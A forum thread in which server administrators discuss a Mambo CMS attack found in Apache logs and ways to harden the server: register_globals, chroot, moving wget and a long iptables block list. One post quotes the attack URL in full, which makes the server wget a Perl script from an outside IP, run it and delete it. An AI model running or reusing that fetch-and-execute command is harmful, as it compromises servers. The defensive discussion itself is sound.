Re: Securing Apache with Perl

You can secure your system, but you can prevent from trying, you can configure Perl Taint Mode and apache in chroot jail. And maybe, you could use swatch.

The swatch tool monitor patterns in log files and if a patter is found, an action is executed. You can use swatch to automatically create iptables rules for these kinds of requests.

Is there any way to prevent someone from calling perl?

For example - what if I moved perl into a different directory - one that isn't in PATH...then modify perl scripts to have that new location?

Rgds...Geoff

Shalom Geoff,

Are you sweeping the log with an automated cron script for this activity and then adding it to iptables? That could help.

This is very similar to the proxy redirect problem I encountered in the US for months.

The eventual solution was to locate the servers behind a hardware fireall solution that limited the inbound ports and protected against overloads on supposedly secure ports.

I'd like to see Ivan's procedure in more detail however.

SEP

Goeff, I'm obviously missing something. Where in the log does it show perl is being called on the local machine?

SEP

Right here - first is does a wget, then executes perl on it, then rm's it:

http://81.56.218.236/cmd.txt?&cmd=cd%20/tmp;wget%20http://81.56.218.236/mambes.txt;mv%20mambes.txt%20mambis.txt;perl%20mambis.txt;rm%20-rf%20mambis.txt ?

Rgds...Geoff

For more information see:

http://www.cncode.com/Download.asp?ID=1589&URL=http://downloads38.cncode.com/book/Server/HardeningApache.rar

If you don't enable cgi mechanisms in
apache they cant call perl.
It looks like you may have php enabled.

You can restrict the directories that
cgi will run is as well.

The user apache runs as should NOT be able
to write any files or directories in the
paths available to apache. The execption
would be any files required to be written
by any CGI scripts you do enable. This
should be a limted number of directories.

If index.php does not handle any parmeters
then the references to perl are meaningless.
Remove maps/cmd.txt.

Check index.php for code similar to
cmd.txt and disable it.

Check the documetmentation at apache.org
for more details.

You could consider restricting execution
of perl so that only root and one group
other than that of the apache server can
run it. This would prevent it from being run
by CGIs running under apache.

Wow, Mambo exploit! Haven't seen this one before!

What version of Mambo is it?

Ok, let me expand on this thought a bit.

The '/index.php' is being passed various arguments:

_REQUEST[option]=com_content
_REQUEST[itemid]=1
GLOBALS=
mosConfig_absolute_path=http://.....

As PHP's 'register_globals = on', it's expanding _REQUEST[option] to the PHP variable "$_REQUEST['option']", which is then getting interpreted by the Mambo code as if it should be there, over-writing anything that Mambo would put in there normally.

This is also what's over-writing the localized '$mosConfig_absolute_path'. I would assume that this is fopen()'d at some point, which is why this exploit comes even close to working.

So, short fix?

Try setting 'register_globals = off' in your 'php.ini'. You'll need to double check the operation of your PHP routines after this though, as any place you've relied upon this automatic translation of POST/GET variables into PHP $variables will break (should move to $_REQUEST['name'] instead).

Got it.

If you shut down cgi, your web server will lose functionality. You can afford to disable wget however and that will stop this particular attack.

After that you have to harden apache against this stuff and please share, because you are not the only one undergoing this attack.

I think also your firewall might not be secure and you should post the configuration here or in another thread.

SEP

This exploit doesn't affect current Mambo (I'm running 4.5.3h)...

register globals is off.

To make the server safer, I will chroot apache (my dns is already...)...

As far as firewall - well...it is fairly large - but I attached as a txt file.

# wc iptables
1347 9177 52861 iptables

Also - I moved wget somewhere else...as only I need it...

perl taint mode doesn't apply - as the hackers aren't calling it that way...

All good info - points forthcoming - so be patient :)



Thanks...Geoff

I would like to see what doc you use to chroot apache. I have two servers waiting for production and should obviously make this happen.

0 for this.

Shmuel

Currently, I'm looking at this one:

http://www.faqs.org/docs/securing/chap29sec254.html

Rgds...Geoff

I'm assuming you've applied the patch that's listed on the mamby page? ( http://mamboxchange.com/frs/?group_id=5 )

chroot - has become really complicated...

I also use mysql - so that throws another wrinkle - havn't been able to get it all together...

One day, there will be a way to accomplish what I want...

Unfortunately, I don't have a lot of time...

For now, I have moved wget outside of any PATH - and it can't be guessed easily..

Also, I added some more to my iptables:


# morons trying tool hack
# first ones are web servers with tool on them
$IPT -A INPUT -p ALL -s 38.119.100.0/24 -j DROP
$IPT -A INPUT -p ALL -s 59.106.19.0/24 -j DROP
$IPT -A INPUT -p ALL -s 198.78.81.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.39.58.0/24 -j DROP
# here are the hacker machines
$IPT -A INPUT -p ALL -s 12.178.213.0/24 -j DROP
$IPT -A INPUT -p ALL -s 24.209.99.0/24 -j DROP
$IPT -A INPUT -p ALL -s 24.21.32.0/24 -j DROP
$IPT -A INPUT -p ALL -s 24.232.75.0/24 -j DROP
$IPT -A INPUT -p ALL -s 24.80.96.0/24 -j DROP
$IPT -A INPUT -p ALL -s 58.26.138.0/24 -j DROP
$IPT -A INPUT -p ALL -s 58.69.172.0/24 -j DROP
$IPT -A INPUT -p ALL -s 59.120.225.0/24 -j DROP
$IPT -A INPUT -p ALL -s 61.195.151.0/24 -j DROP
$IPT -A INPUT -p ALL -s 61.91.96.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.100.60.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.1.211.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.108.171.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.141.50.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.141.52.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.141.54.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.141.58.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.148.178.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.149.140.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.149.228.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.149.36.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.154.233.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.193.204.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.193.211.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.193.225.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.193.228.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.193.229.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.193.230.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.193.242.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.2.78.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.212.81.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.242.186.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.252.32.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.64.17.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.70.54.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.73.211.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.75.148.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.75.171.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.75.177.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.75.178.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.75.221.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.87.177.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.97.117.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.99.179.0/24 -j DROP
$IPT -A INPUT -p ALL -s 64.119.178.0/24 -j DROP
$IPT -A INPUT -p ALL -s 64.14.74.0/24 -j DROP
$IPT -A INPUT -p ALL -s 64.207.132.0/24 -j DROP
$IPT -A INPUT -p ALL -s 64.27.28.0/24 -j DROP
$IPT -A INPUT -p ALL -s 64.38.12.0/24 -j DROP
$IPT -A INPUT -p ALL -s 64.39.29.0/24 -j DROP
$IPT -A INPUT -p ALL -s 64.62.190.0/24 -j DROP
$IPT -A INPUT -p ALL -s 64.71.140.0/24 -j DROP
$IPT -A INPUT -p ALL -s 64.76.186.0/24 -j DROP
$IPT -A INPUT -p ALL -s 64.81.34.0/24 -j DROP
$IPT -A INPUT -p ALL -s 65.111.165.0/24 -j DROP
$IPT -A INPUT -p ALL -s 65.12.236.0/24 -j DROP
$IPT -A INPUT -p ALL -s 65.174.146.0/24 -j DROP
$IPT -A INPUT -p ALL -s 65.175.135.0/24 -j DROP
$IPT -A INPUT -p ALL -s 65.254.32.0/24 -j DROP
$IPT -A INPUT -p ALL -s 65.254.36.0/24 -j DROP
$IPT -A INPUT -p ALL -s 65.254.53.0/24 -j DROP
$IPT -A INPUT -p ALL -s 65.75.190.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.111.211.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.132.203.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.134.41.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.152.98.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.180.195.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.197.129.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.197.177.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.208.60.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.216.159.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.221.65.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.226.242.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.227.127.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.232.134.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.240.188.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.240.226.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.240.238.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.246.218.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.36.233.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.45.10.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.88.106.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.96.219.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.98.166.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.98.196.0/24 -j DROP
$IPT -A INPUT -p ALL -s 67.109.217.0/24 -j DROP
$IPT -A INPUT -p ALL -s 67.109.23.0/24 -j DROP
$IPT -A INPUT -p ALL -s 67.18.166.0/24 -j DROP
$IPT -A INPUT -p ALL -s 67.18.40.0/24 -j DROP
$IPT -A INPUT -p ALL -s 67.19.209.0/24 -j DROP
$IPT -A INPUT -p ALL -s 67.41.199.0/24 -j DROP
$IPT -A INPUT -p ALL -s 67.79.144.0/24 -j DROP
$IPT -A INPUT -p ALL -s 68.146.208.0/24 -j DROP
$IPT -A INPUT -p ALL -s 68.167.33.0/24 -j DROP
$IPT -A INPUT -p ALL -s 68.178.157.0/24 -j DROP
$IPT -A INPUT -p ALL -s 68.178.161.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.10.136.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.159.203.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.16.197.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.16.214.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.17.124.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.20.16.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.56.201.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.60.115.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.61.30.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.64.32.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.64.37.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.66.61.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.67.32.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.72.153.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.72.187.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.72.225.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.81.39.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.93.134.0/24 -j DROP
$IPT -A INPUT -p ALL -s 69.94.41.0/24 -j DROP
$IPT -A INPUT -p ALL -s 70.231.140.0/24 -j DROP
$IPT -A INPUT -p ALL -s 70.231.162.0/24 -j DROP
$IPT -A INPUT -p ALL -s 70.60.85.0/24 -j DROP
$IPT -A INPUT -p ALL -s 70.84.204.0/24 -j DROP
$IPT -A INPUT -p ALL -s 70.84.205.0/24 -j DROP
$IPT -A INPUT -p ALL -s 70.85.133.0/24 -j DROP
$IPT -A INPUT -p ALL -s 70.85.186.0/24 -j DROP
$IPT -A INPUT -p ALL -s 70.86.48.0/24 -j DROP
$IPT -A INPUT -p ALL -s 70.87.45.0/24 -j DROP
$IPT -A INPUT -p ALL -s 70.87.79.0/24 -j DROP
$IPT -A INPUT -p ALL -s 72.21.44.0/24 -j DROP
$IPT -A INPUT -p ALL -s 72.29.79.0/24 -j DROP
$IPT -A INPUT -p ALL -s 72.3.139.0/24 -j DROP
$IPT -A INPUT -p ALL -s 72.3.235.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.177.117.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.179.151.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.190.249.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.199.13.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.201.172.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.203.213.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.231.85.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.237.132.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.237.145.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.237.152.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.237.24.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.63.235.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.65.162.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.68.90.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.69.84.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.74.144.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.76.61.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.81.122.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.82.18.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.84.64.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.86.174.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.86.200.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.86.91.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.169.128.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.169.134.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.169.136.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.169.155.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.169.165.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.169.170.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.169.171.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.169.177.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.169.178.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.169.182.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.169.186.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.169.188.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.174.30.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.174.48.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.183.239.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.196.47.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.240.177.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.241.238.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.30.206.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.90.33.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.92.213.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.93.136.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.94.11.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.100.3.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.103.128.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.112.90.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.113.204.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.119.205.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.165.238.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.165.244.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.165.248.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.165.251.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.165.27.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.165.38.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.165.41.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.165.8.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.192.74.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.192.84.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.195.155.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.208.35.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.220.2.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.221.48.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.70.196.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.76.51.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.77.71.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.102.225.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.133.127.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.137.129.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.149.82.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.16.203.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.170.75.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.17.171.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.17.237.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.17.252.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.18.172.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.19.254.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.19.92.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.217.72.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.227.41.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.236.200.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.236.223.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.238.19.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.64.220.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.65.25.0/24 -j DROP
$IPT -A INPUT -p ALL -s 84.163.160.0/24 -j DROP
$IPT -A INPUT -p ALL -s 84.191.60.0/24 -j DROP
$IPT -A INPUT -p ALL -s 84.233.156.0/24 -j DROP
$IPT -A INPUT -p ALL -s 84.24.21.0/24 -j DROP
$IPT -A INPUT -p ALL -s 84.243.244.0/24 -j DROP
$IPT -A INPUT -p ALL -s 84.244.10.0/24 -j DROP
$IPT -A INPUT -p ALL -s 84.244.1.0/24 -j DROP
$IPT -A INPUT -p ALL -s 84.244.131.0/24 -j DROP
$IPT -A INPUT -p ALL -s 84.244.6.0/24 -j DROP
$IPT -A INPUT -p ALL -s 84.246.242.0/24 -j DROP
$IPT -A INPUT -p ALL -s 84.246.245.0/24 -j DROP
$IPT -A INPUT -p ALL -s 84.40.21.0/24 -j DROP
$IPT -A INPUT -p ALL -s 84.45.67.0/24 -j DROP
$IPT -A INPUT -p ALL -s 84.98.148.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.10.211.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.111.4.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.14.216.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.142.32.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.159.88.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.17.1.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.17.3.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.190.1.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.197.248.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.214.17.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.214.22.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.214.28.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.214.33.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.214.39.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.25.8.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.34.189.0/24 -j DROP
$IPT -A INPUT -p ALL -s 85.39.124.0/24 -j DROP
$IPT -A INPUT -p ALL -s 86.109.96.0/24 -j DROP
$IPT -A INPUT -p ALL -s 86.34.150.0/24 -j DROP
$IPT -A INPUT -p ALL -s 86.39.130.0/24 -j DROP
$IPT -A INPUT -p ALL -s 86.43.64.0/24 -j DROP
$IPT -A INPUT -p ALL -s 86.55.7.0/24 -j DROP
$IPT -A INPUT -p ALL -s 87.233.14.0/24 -j DROP
$IPT -A INPUT -p ALL -s 88.80.193.0/24 -j DROP
$IPT -A INPUT -p ALL -s 129.241.152.0/24 -j DROP
$IPT -A INPUT -p ALL -s 130.226.80.0/24 -j DROP
$IPT -A INPUT -p ALL -s 130.89.164.0/24 -j DROP
$IPT -A INPUT -p ALL -s 131.203.76.0/24 -j DROP
$IPT -A INPUT -p ALL -s 137.224.96.0/24 -j DROP
$IPT -A INPUT -p ALL -s 141.44.47.0/24 -j DROP
$IPT -A INPUT -p ALL -s 141.62.98.0/24 -j DROP
$IPT -A INPUT -p ALL -s 143.234.96.0/24 -j DROP
$IPT -A INPUT -p ALL -s 147.202.66.0/24 -j DROP
$IPT -A INPUT -p ALL -s 148.216.6.0/24 -j DROP
$IPT -A INPUT -p ALL -s 155.185.227.0/24 -j DROP
$IPT -A INPUT -p ALL -s 156.63.169.0/24 -j DROP
$IPT -A INPUT -p ALL -s 157.118.21.0/24 -j DROP
$IPT -A INPUT -p ALL -s 158.42.184.0/24 -j DROP
$IPT -A INPUT -p ALL -s 158.75.102.0/24 -j DROP
$IPT -A INPUT -p ALL -s 161.139.114.0/24 -j DROP
$IPT -A INPUT -p ALL -s 161.246.1.0/24 -j DROP
$IPT -A INPUT -p ALL -s 161.53.191.0/24 -j DROP
$IPT -A INPUT -p ALL -s 166.114.248.0/24 -j DROP
$IPT -A INPUT -p ALL -s 171.64.116.0/24 -j DROP
$IPT -A INPUT -p ALL -s 193.109.36.0/24 -j DROP
$IPT -A INPUT -p ALL -s 193.110.59.0/24 -j DROP
$IPT -A INPUT -p ALL -s 193.136.19.0/24 -j DROP
$IPT -A INPUT -p ALL -s 193.136.60.0/24 -j DROP
$IPT -A INPUT -p ALL -s 193.189.141.0/24 -j DROP
$IPT -A INPUT -p ALL -s 193.192.247.0/24 -j DROP
$IPT -A INPUT -p ALL -s 193.203.240.0/24 -j DROP
$IPT -A INPUT -p ALL -s 193.206.78.0/24 -j DROP
$IPT -A INPUT -p ALL -s 193.226.129.0/24 -j DROP
$IPT -A INPUT -p ALL -s 193.255.143.0/24 -j DROP
$IPT -A INPUT -p ALL -s 193.43.88.0/24 -j DROP
$IPT -A INPUT -p ALL -s 194.106.45.0/24 -j DROP
$IPT -A INPUT -p ALL -s 194.126.106.0/24 -j DROP
$IPT -A INPUT -p ALL -s 194.150.208.0/24 -j DROP
$IPT -A INPUT -p ALL -s 194.29.142.0/24 -j DROP
$IPT -A INPUT -p ALL -s 194.42.16.0/24 -j DROP
$IPT -A INPUT -p ALL -s 194.63.250.0/24 -j DROP
$IPT -A INPUT -p ALL -s 194.95.249.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.137.64.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.140.132.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.140.135.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.165.93.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.171.106.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.177.242.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.199.199.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.251.114.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.252.123.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.252.72.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.35.83.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.42.160.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.48.3.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.54.133.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.56.146.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.95.222.0/24 -j DROP
$IPT -A INPUT -p ALL -s 196.200.57.0/24 -j DROP
$IPT -A INPUT -p ALL -s 198.173.254.0/24 -j DROP
$IPT -A INPUT -p ALL -s 198.54.202.0/24 -j DROP
$IPT -A INPUT -p ALL -s 198.66.222.0/24 -j DROP
$IPT -A INPUT -p ALL -s 198.69.255.0/24 -j DROP
$IPT -A INPUT -p ALL -s 199.227.113.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.105.234.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.105.251.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.110.92.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.123.164.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.126.104.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.126.114.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.126.82.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.126.83.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.17.53.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.179.34.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.21.94.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.250.54.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.252.0.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.27.236.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.28.128.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.29.0.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.30.74.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.45.94.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.50.15.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.58.112.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.58.203.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.66.109.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.74.165.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.79.75.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.85.220.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.94.115.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.94.197.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.96.82.0/24 -j DROP
$IPT -A INPUT -p ALL -s 201.134.134.0/24 -j DROP
$IPT -A INPUT -p ALL -s 201.227.89.0/24 -j DROP
$IPT -A INPUT -p ALL -s 201.27.49.0/24 -j DROP
$IPT -A INPUT -p ALL -s 202.125.42.0/24 -j DROP
$IPT -A INPUT -p ALL -s 202.133.209.0/24 -j DROP
$IPT -A INPUT -p ALL -s 202.142.221.0/24 -j DROP
$IPT -A INPUT -p ALL -s 202.150.196.0/24 -j DROP
$IPT -A INPUT -p ALL -s 202.174.109.0/24 -j DROP
$IPT -A INPUT -p ALL -s 202.177.25.0/24 -j DROP
$IPT -A INPUT -p ALL -s 202.181.97.0/24 -j DROP
$IPT -A INPUT -p ALL -s 202.222.30.0/24 -j DROP
$IPT -A INPUT -p ALL -s 202.28.77.0/24 -j DROP
$IPT -A INPUT -p ALL -s 202.58.85.0/24 -j DROP
$IPT -A INPUT -p ALL -s 202.71.104.0/24 -j DROP
$IPT -A INPUT -p ALL -s 202.75.4.0/24 -j DROP
$IPT -A INPUT -p ALL -s 203.128.7.0/24 -j DROP
$IPT -A INPUT -p ALL -s 203.130.198.0/24 -j DROP
$IPT -A INPUT -p ALL -s 203.130.216.0/24 -j DROP
$IPT -A INPUT -p ALL -s 203.130.232.0/24 -j DROP
$IPT -A INPUT -p ALL -s 203.142.16.0/24 -j DROP
$IPT -A INPUT -p ALL -s 203.146.102.0/24 -j DROP
$IPT -A INPUT -p ALL -s 203.172.176.0/24 -j DROP
$IPT -A INPUT -p ALL -s 203.31.191.0/24 -j DROP
$IPT -A INPUT -p ALL -s 203.63.5.0/24 -j DROP
$IPT -A INPUT -p ALL -s 203.79.114.0/24 -j DROP
$IPT -A INPUT -p ALL -s 204.11.234.0/24 -j DROP
$IPT -A INPUT -p ALL -s 204.202.22.0/24 -j DROP
$IPT -A INPUT -p ALL -s 205.134.236.0/24 -j DROP
$IPT -A INPUT -p ALL -s 205.237.29.0/24 -j DROP
$IPT -A INPUT -p ALL -s 205.252.5.0/24 -j DROP
$IPT -A INPUT -p ALL -s 206.225.82.0/24 -j DROP
$IPT -A INPUT -p ALL -s 206.225.87.0/24 -j DROP
$IPT -A INPUT -p ALL -s 207.210.64.0/24 -j DROP
$IPT -A INPUT -p ALL -s 207.58.138.0/24 -j DROP
$IPT -A INPUT -p ALL -s 207.58.139.0/24 -j DROP
$IPT -A INPUT -p ALL -s 207.58.146.0/24 -j DROP
$IPT -A INPUT -p ALL -s 207.58.161.0/24 -j DROP
$IPT -A INPUT -p ALL -s 207.71.17.0/24 -j DROP
$IPT -A INPUT -p ALL -s 208.186.169.0/24 -j DROP
$IPT -A INPUT -p ALL -s 209.123.8.0/24 -j DROP
$IPT -A INPUT -p ALL -s 209.126.144.0/24 -j DROP
